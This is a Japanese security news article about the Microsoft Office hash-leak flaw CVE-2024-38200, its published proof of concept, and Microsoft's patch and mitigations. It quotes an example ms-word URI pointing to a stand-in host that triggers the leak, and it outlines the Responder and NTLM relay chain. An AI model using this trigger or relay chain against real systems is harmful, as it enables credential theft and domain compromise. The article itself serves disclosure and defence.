Microsoft Office の脆弱性 CVE-2024-38200:NTLMv2 ハッシュ・キャプチャの PoC が提供

0-Day Flaw CVE-2024-38200 in Microsoft Office Exposes NTLMv2 Hashes: PoC Exploit Released

2024/10/02 SecurityOnline — 2024年8月にゼロデイとして発見された脆弱性により、Microsoft Office ユーザーが危険にさらされている。先日に、Microsoft Office の深刻な情報漏えいの脆弱性 CVE-2024-38200 に関する、技術的な詳細と概念実証 (PoC) エクスプロイトが、セキュリティ研究者の Metin Yunus Kandemir により公開された。この脆弱性は、Office 2016/Office 2019/Office LTSC 2021/Microsoft 365 Apps for Enterprise など複数バージョンに影響を及ぼす。その悪用に成功した権限のない脅威アクターが、保護されている情報への不正アクセスを達成する可能性が生じており、セキュリティ専門家の間で懸念が高まっている。

Microsoft Office の情報漏えいの脆弱性 CVE-2024-38200 の悪用に成功した攻撃者は、HTTP/SMB プロトコル経由で NTLMv2 ハッシュなどの機密認証データのキャプチャを達成する。このエクスプロイト・チェーンは、ユーザーを騙して特別に細工されたリンクをクリックさせ、侵害した Web サイトまたは攻撃者が管理する Web サイトでホストされている、悪意のドキュメントへと誘導することで始まる。脆弱なバージョンの Office じょうで、この悪意のファイルが開かれると、攻撃者による NTLMv2 ハッシュがキャプチャされてしまう。ここで盗み出される情報が、ドメイン・コントローラーで NTLM リレー攻撃を開始するための重要な要素となる。

Microsoft のアドバイザリには、「この攻撃者は、侵害済の Web サイトに細工された Office ファイルをホストし、被害者に電子メール/インスタント・メッセージを送信してダウンロードを促す。続いて、この悪意のファイルを被害者が操作すると、悪意のコードがネットワーク経由で NTLMv2 ハッシュをキャプチャし、攻撃者が制御するサーバへと HTTP リクエストをリダイレクトする」と記されている。

さらに、この脆弱性は、Microsoft 365 Office/Office 2019 における、特定のセキュリティ・メカニズムをバイパスするため、きわめて危険な存在である。従来からの Office 2016 などの旧バージョンのセキュリティ警告では、このような悪用からユーザーは保護されていた。ただし、新しいバージョンでは、ユーザーに気付かれることなく、この脆弱性を攻撃者が悪用できるため、機密情報をキャプチャが容易になっている。

Metin Yunus Kandemir によるエクスプロイトの手法では、Office URI スキームが、具体的には ms-word コマンドが悪用される。彼の PoC エクスプロイトでは、URL (例: ms-word:ofe|u|http://test.local:8080/leak/leak.docx) を介してリモート・ファイルにアクセスし、脆弱性をトリガーする方法が示されている。攻撃者は、uncredirect.py などのツールを使用し、Office HTTP リクエストを UNC パスにリダイレクトすることで、セキュリティ制限を回避し、NTLMv2 ハッシュをキャプチャする。それにより、NTLM リレーなどの、さらなる攻撃が可能になっていく。

Kandemir の研究から得られた重要な洞察の1つは、ユーザーがリモート・ファイルを操作したときに、Office 2016 ではセキュリティ警告が表示されていたのに対して、Microsoft 365 Office/Office 2019 では表示されんかったことだ。つまり、後者では、ユーザーに対して警告を表示することなく、この脆弱性の悪用が可能になっている。

この攻撃チェーンでは、ドメイン・コントローラーに対する NTLM リレー攻撃を実行するために、NTLMv2 ハッシュが重要となる。この攻撃により、正当なユーザーを装う認証バイパスや、ネットワーク・リソースへの不正アクセスなどが発生する。 Office の脆弱な URI スキームを悪用する攻撃者は、悪意を持って制御された UNC パスへと、HTTP リクエストをリダイレクトする。そこで、Responder サーバが NTLMv2 ハッシュをキャプチャし、SMB セキュリティ制限を回避していく。

2024年8月の Patch Tuesday で Microsoft は、脆弱性 CVE-2024-38200 に対処している。その一方で Microsoft は、修正プログラムを直ちに適用できないケースにおいて、以下の手順を実行することで、潜在的な悪用リスクを軽減するよう、ユーザーに推奨している。

送信 NTLM トラフィックをブロックするための推奨される、軽減手法は次のとおりである。

  • ネットワーク・セキュリティ:NTLM ポリシーの制限:リモート・サーバーへ向けた送信において、NTLM トラフィック・グループ・ポリシーをコンフィグする。このコンフィグにより、Windows 7/Windows Server 2008 以降のバージョンにおける NTLM トラフィックをブロックする。
  • Protected Users セキュリティ・グループ:Protected Users セキュリティ・グループにユーザーを追加する。それにより、認証方法としての NTLM の使用が制限される。
  • TCP ポート 445 のブロック:NTLM リレー攻撃の一般的な経路である、TCP ポート 445 への送信トラフィックを停止する。

これらの方法は効果的だが、トラフィック・ルートがブロックされることで、NTLM 認証に依存する正当なサービスが中断される可能性があると、Microsoft は警告している。

NTLM に関しては、2024/06/04 の「Windows NTLM 認証プロトコルの廃止に踏み切る Microsoft:Kerberos/Negotiate への移行は簡単か?」にあるように、Microsoft の方針は定まっているようです。しかし、その一方では、今回の脆弱性 CVE-2024-38200 などが悪用されることで、その弱点を露呈しています。よろしければ、NTLM で検索も、ご参照ください。